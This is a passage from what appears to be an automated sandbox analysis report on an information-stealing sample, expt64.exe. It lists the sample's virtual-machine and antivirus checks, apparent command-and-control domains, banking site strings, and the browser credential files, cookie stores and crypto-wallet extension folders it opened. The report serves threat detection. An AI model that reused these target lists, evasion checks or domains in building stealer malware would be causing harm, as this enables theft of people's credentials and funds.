              Source: C:\Users\user\Desktop\expt64.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: expt64.exeStatic file information: File size 10171362 > 1048576
              Source: expt64.exeStatic PE information: real checksum: 0x1560fd4 should be: 0x9bd62e
              Source: expt64.exeStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_3_0069424A push ecx; retf 0_3_00694270
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_023300DC push eax; mov dword ptr [esp], 352E36E1h0_2_023300DF
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_02333AF6 push 8F60BAE3h; retf 0_2_02333AFB
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_0232CFDC push eax; mov dword ptr [esp], 31A531AAh0_2_0232CFEA
              Source: C:\Users\user\Desktop\expt64.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\expt64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\expt64.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\expt64.exe TID: 1324Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\expt64.exe TID: 1252Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: expt64.exe, 00000000.00000003.2517769062.000000000334B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696508427p
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696508427
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696508427
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696508427s
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696508427f
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696508427
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427x
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696508427
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696508427}
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696508427u
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696508427d
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696508427t
              Source: expt64.exe, 00000000.00000003.2491031020.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2519546371.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581824546.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2491633034.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2517025375.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000002.2581461524.0000000000628000.00000004.00000020.00020000.00000000.sdmp, expt64.exe, 00000000.00000003.2481180004.000000000069C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696508427|UE
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696508427
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696508427p
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696508427n
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696508427x
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696508427~
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427^
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696508427}
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696508427h
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696508427o
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696508427z
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696508427
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696508427
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696508427j
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696508427x
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696508427
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696508427]
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696508427
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696508427t
              Source: expt64.exe, 00000000.00000003.2517769062.0000000003346000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696508427
              Source: C:\Users\user\Desktop\expt64.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F05AF mov edx, dword ptr fs:[00000030h]0_2_022F05AF
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F0B6F mov eax, dword ptr fs:[00000030h]0_2_022F0B6F
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F11BF mov eax, dword ptr fs:[00000030h]0_2_022F11BF
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F11BE mov eax, dword ptr fs:[00000030h]0_2_022F11BE
              Source: C:\Users\user\Desktop\expt64.exeCode function: 0_2_022F0F1F mov eax, dword ptr fs:[00000030h]0_2_022F0F1F

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: expt64.exeString found in binary or memory: talkynicer.lat
              Source: expt64.exeString found in binary or memory: shapestickyr.lat
              Source: expt64.exeString found in binary or memory: manyrestro.lat
              Source: expt64.exeString found in binary or memory: bashfulacid.lat
              Source: expt64.exeString found in binary or memory: tentabatte.lat
              Source: expt64.exeString found in binary or memory: curverpluch.lat
              Source: expt64.exeString found in binary or memory: slipperyloo.lat
              Source: expt64.exeString found in binary or memory: wordyfindy.lat
              Source: C:\Users\user\Desktop\expt64.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: expt64.exe, 00000000.00000003.2568391413.0000000000708000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\expt64.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: expt64.exe PID: 6988, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.2582559502.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
              Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: expt64.exe, 00000000.00000003.2519546371.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
              Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: expt64.exe, 00000000.00000003.2530528245.00000000006B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: expt64.exe, 00000000.00000003.2530528245.00000000006EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: expt64.exe, 00000000.00000003.2517025375.00000000006E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\expt64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
